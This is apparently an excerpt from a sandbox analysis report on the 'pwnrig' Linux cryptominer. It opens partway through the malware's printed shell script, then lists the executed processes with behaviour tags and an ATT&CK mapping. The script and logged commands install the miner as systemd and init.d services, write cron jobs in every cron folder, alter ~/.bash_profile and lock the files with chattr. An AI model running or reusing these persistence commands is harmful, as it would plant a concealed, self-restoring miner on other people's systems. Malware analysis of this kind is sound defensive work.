/dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
3⤵
- Attempts to change immutable files
- Writes file to tmp directory
PID:1877

/usr/bin/id
id -u
4⤵
PID:1878

/usr/bin/id
id -u
4⤵
PID:1879

/usr/bin/chattr
chattr -i -a /bin/bprofr "~/.bash_profile"
4⤵
- Attempts to change immutable files
PID:1880

/usr/bin/rm
rm -rf /bin/bprofr
4⤵
PID:1881

/usr/bin/sed
sed -i /bprofr/d "~/.bash_profile"
4⤵
- Attempts to change immutable files
PID:1882

/usr/bin/cp
cp -f -r -- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 /bin/bprofr
4⤵
- Writes file to system bin folder
PID:1883

/usr/bin/id
id -u
4⤵
PID:1884

/usr/bin/chattr
chattr +i +a /bin/bprofr "~/.bash_profile"
4⤵
- Attempts to change immutable files
PID:1885

/usr/bin/mkdir
mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
4⤵
PID:1886

/usr/bin/chattr
chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
4⤵
- Attempts to change immutable files
PID:1887

/usr/bin/rm
rm -rf /bin/crondr
4⤵
PID:1888

/usr/bin/cp
cp -f -r -- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 /bin/crondr
4⤵
- Writes file to system bin folder
PID:1889

/usr/bin/tee
tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
4⤵
- Creates/modifies Cron job
PID:1891

/usr/bin/sed
sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
4⤵
- Attempts to change immutable files
- Creates/modifies Cron job
PID:1892

/usr/bin/chmod
chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
4⤵
PID:1893

/usr/bin/chattr
chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
4⤵
- Attempts to change immutable files
PID:1894

/usr/bin/which
which chkconfig
4⤵
PID:1895

/usr/bin/which
which update-rc.d
4⤵
PID:1896

/usr/bin/chattr
chattr -i -a /etc/init.d/pwnrig /bin/initdr
4⤵
- Attempts to change immutable files
PID:1897

/usr/sbin/update-rc.d
update-rc.d -f pwnrig disable
4⤵
- Flushes firewall rules
PID:1898

/usr/sbin/update-rc.d
update-rc.d -f pwnrig remove
4⤵
PID:1899

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1900

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:1900

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1900

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
PID:1900

/usr/bin/rm
rm -rf /bin/initdr
4⤵
PID:1927

/usr/bin/cp
cp -f -r -- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 /bin/initdr
4⤵
- Writes file to system bin folder
PID:1928

/usr/bin/tee
tee /etc/init.d/pwnrig
4⤵
- Modifies init.d
PID:1930

/usr/bin/sed
sed -i "1 s/-e //" /etc/init.d/pwnrig
4⤵
- Attempts to change immutable files
- Modifies init.d
PID:1931

/usr/bin/chmod
chmod +x /etc/init.d/pwnrig /bin/initdr
4⤵
PID:1932

/usr/sbin/update-rc.d
update-rc.d pwnrig defaults
4⤵
PID:1933

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1934

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:1934

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1934

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:1934

/usr/sbin/update-rc.d
update-rc.d pwnrig enable
4⤵
PID:1960

/usr/local/sbin/systemctl
systemctl --quiet enable pwnrig
5⤵
PID:1961

/usr/local/bin/systemctl
systemctl --quiet enable pwnrig
5⤵
PID:1961

/usr/sbin/systemctl
systemctl --quiet enable pwnrig
5⤵
PID:1961

/usr/bin/systemctl
systemctl --quiet enable pwnrig
5⤵
- Reads EFI boot settings
PID:1961

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1962

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:1962

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1962

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:1962

/usr/bin/chattr
chattr +i +a /etc/init.d/pwnrig /bin/initdr
4⤵
- Attempts to change immutable files
PID:1988

/usr/bin/which
which systemctl
4⤵
PID:1989

/usr/bin/chattr
chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
4⤵
- Attempts to change immutable files
PID:1990

/usr/bin/rm
rm -rf /bin/sysdr
4⤵
PID:1991

/usr/bin/cp
cp -f -r -- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 /bin/sysdr
4⤵
- Writes file to system bin folder
PID:1992

/usr/bin/tee
tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
4⤵
- Modifies systemd
PID:1994

/usr/bin/sed
sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
4⤵
- Attempts to change immutable files
PID:1995

/usr/bin/chattr
chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
4⤵
- Attempts to change immutable files
PID:1996

/usr/bin/systemctl
systemctl enable pwnrige.service
4⤵
- Reads EFI boot settings
- Reads runtime system information
PID:1997

/usr/bin/systemctl
systemctl enable pwnrigl.service
4⤵
- Reads EFI boot settings
PID:2023

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:2049

/usr/bin/systemctl
systemctl reload-or-restart pwnrige.service
4⤵
- Reads EFI boot settings
- Reads runtime system information
PID:2075

/usr/bin/nohup
nohup ./dpkg-deb-package
1⤵
PID:1636

/usr/bin/dpkg-deb-package
./dpkg-deb-package
1⤵
PID:1636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Defense Evasion

Hijack Execution Flow

Virtualization/Sandbox Evasion

Credential Access

Discovery

System Information Discovery

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion